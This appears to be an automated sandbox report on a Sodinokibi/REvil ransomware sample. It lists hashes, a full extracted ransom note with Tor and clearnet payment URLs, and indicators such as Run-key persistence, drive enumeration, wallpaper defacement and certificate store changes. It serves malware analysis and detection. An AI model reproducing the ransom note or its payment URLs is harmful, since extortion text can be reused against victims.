sodinokibi | 3a6a69d72b533a2e5051973c85a7be5d25f661df01111e17e439126241c9ea39

General

Target

13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Size

166KB
MD5

13577e7b34a4c62a7a0944121ff84c70
SHA1

06f3daf23dd391ad7e8b8aef613f58cb9baadc11
SHA256

3a6a69d72b533a2e5051973c85a7be5d25f661df01111e17e439126241c9ea39
SHA512

2fcf381f1424336701de4fe631f015eccf8b65ac58909401efb1986f80672571713b0b818b26f2cadb44de8d4e5918ce3865346c42546b8e94286be595879bd1
SSDEEP

3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3Qfexg3759um6C6lg:ZJ0BXScFy2RsQJ8zgWxI759fbSg

Score

10^/10

sodinokibi persistence ransomware

Malware Config

Extracted

Path

C:\Users\7zr2x39k-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 7zr2x39k. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/24088A9F2C6B4CB1 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/24088A9F2C6B4CB1 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: QtHynPNlIgvozIkmNpTa6fVqf1sJu+22+T10TW8IasIcl0u7q9l+YLXHXutFBa3I PjZBQLchTYC6abfIoGP8aZd9Ibw6jh+fRLQx5hhEQpJc7O0mszcwri5+VtjmEHs+ MMNdsyWnQwmMI/nvPAVX02Ssql2eZ42jwiarUQrzd70XoFEEAaTLi//8rdpPD2vU kNDBv4Fqr6GLUGR+PuwoVHbY6lAgNUeIQQLlaatIik86RajSVaAThXEJ21eQQRNY k4+Qaq6xe1hl0Y4cgyz+BJtjDOtFEL2PJKAnVs4TteKKFnZj+k1rPwV2x0FVrmmx BfjhwJgBez+Z+6Ozs8XpcPHjKN/xIL/l0U13tPyIMNlhWODqO2KfA7AJTDql53Lz f4C4E+P1lmRrDPgeIs3Tn0mc0Bgax+h7BtLL5jBH9o3A7T+vQDNEqzvru7oNXH8D +tqZ9yV9Zmi+LX5XCv2KSKS7dQQ//wkUYIgqIR9nYno/rFvoGXRDZBYOONDpY/aJ xqEwSwM057Jf7BZw48Rv5O4MOXLkUtMzcGqUGx2gWV6sUkDb91l7qJ+zsC5FTtYz TxqK17DClUGILVylqnFcN2lLpwU3SuVqEmZCsE3/ErsWb0zLcqB8p4s1MVDNKjLm 2iwXGH7BRV9/BeryQPrj6nsanT1MPlx2fPnkL+yXQ+PZVs1QboLP8JBtyv4FaGj6 o57dgcTBT1Ev4XOlIEwJaur3Jm79AJgnAlXcAxh7I16Tltb9EPXTTRuMn3fogMBA YGK2FgHx/vSAXnJ2tY579aqDZNj4O0Y/uJoXAgGgWnFO56GpkHwWwYUb2uWumDUj xqBRKKAa8ES/efYVqDWi/D1qyUH7lGmnx9fh8UglKFpqrXVlCgT1+mw3CAwU/VvG TQp0ckrd2zoZ5AqtU4+qfCSXsxp2D9DA3pyUVf36GstgwKqyMqlOWAbxKyaJklm8 IaRAJYTeL4wITAbyH3dAWCFvE3uAKKRMrCrMMyChtMx5i+3sslKQg0ZDzqFx522H s4khkCKxZQaLTh2Uj/ry+NVCW1Yrh03NG3TuvCQ2a8ct2rWD5H8G/2/UBUQAxsdm Cvezw6mhQaOg3AkFwNy1K6RgtUOquczLCZzwG9hsqIn9eJ33AMzLw2I3Z0+3E6NM wZ4RgLWQoydj9p3jyNgJJwSIoVH7zJulmsRRM6Hj3779/Hsp8UeCRFRE4Y7Yp2wn hxxNJJtvW0mG7GOHS9i3YRQeDrluQ75LVXEWCy88q2vJeUtzT0UkxkxjVPm41M+i NUMkZC5fPEpxn1D5KYMt3xmzRgygjukjFCjF44dgMqvtml2tlVTw7pTGIzlaxhhX ST5cggHkDB9tJKCxRQnKA2XTxulHgUC4GWND34B5vBdXLKIS Extension name: 7zr2x39k ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/24088A9F2C6B4CB1

http://decryptor.cc/24088A9F2C6B4CB1

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\k51299BQXH = "C:\\Users\\Admin\\AppData\\Local\\Temp\\13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe"	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

Drops desktop.ini file(s) 28 IoCs

Processes:

13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

description	ioc	process
File opened for modification	\??\c:\users\admin\pictures\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\libraries\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\favorites\links for united states\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\downloads\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\favorites\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\videos\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\documents\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\documents\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\downloads\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\music\sample music\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\pictures\sample pictures\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\contacts\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\pictures\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\recorded tv\sample media\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files (x86)\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\desktop\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\links\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\videos\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\saved games\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\searches\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\desktop\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\music\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\videos\sample videos\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\music\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\public\recorded tv\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\users\admin\favorites\links\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

description	ioc	process
File opened (read-only)	\??\H:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\L:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\N:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\S:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\G:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\D:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\A:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\B:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\K:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\Q:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\I:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\U:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\Y:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\W:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\P:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\R:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\T:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\V:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\Z:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\F:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\E:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\J:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\O:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\M:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened (read-only)	\??\X:	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

Drops file in System32 directory 1 IoCs

Processes:

13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt 13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\lsi735piyh.bmp"	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

Drops file in Program Files directory 25 IoCs

Processes:

13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

description	ioc	process
File opened for modification	\??\c:\program files\InitializeCompress.jpeg	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\InvokeOut.3g2	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\RedoSend.tmp	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\7zr2x39k-readme.txt	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\DisableCopy.pptx	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SplitFormat.vsx	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\StartReceive.fon	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File created	\??\c:\program files\7zr2x39k-readme.txt	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\BackupClear.emf	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\DismountEnter.css	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\FindGroup.zip	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\CopyDismount.rtf	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\EditUse.fon	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\EditAssert.aiff	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\LimitCompare.temp	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ReceiveRead.m1v	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\7zr2x39k-readme.txt	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\InvokeGroup.jpg	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\StepClose.eps	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\7zr2x39k-readme.txt	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File created	\??\c:\program files (x86)\7zr2x39k-readme.txt	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\DenyRestart.docx	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SplitCompare.asp	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
File opened for modification	\??\c:\program files (x86)\desktop.ini	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

Modifies system certificate store 2 TTPs 12 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000002000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 4300000001000000000000000400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b06010505080202200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee0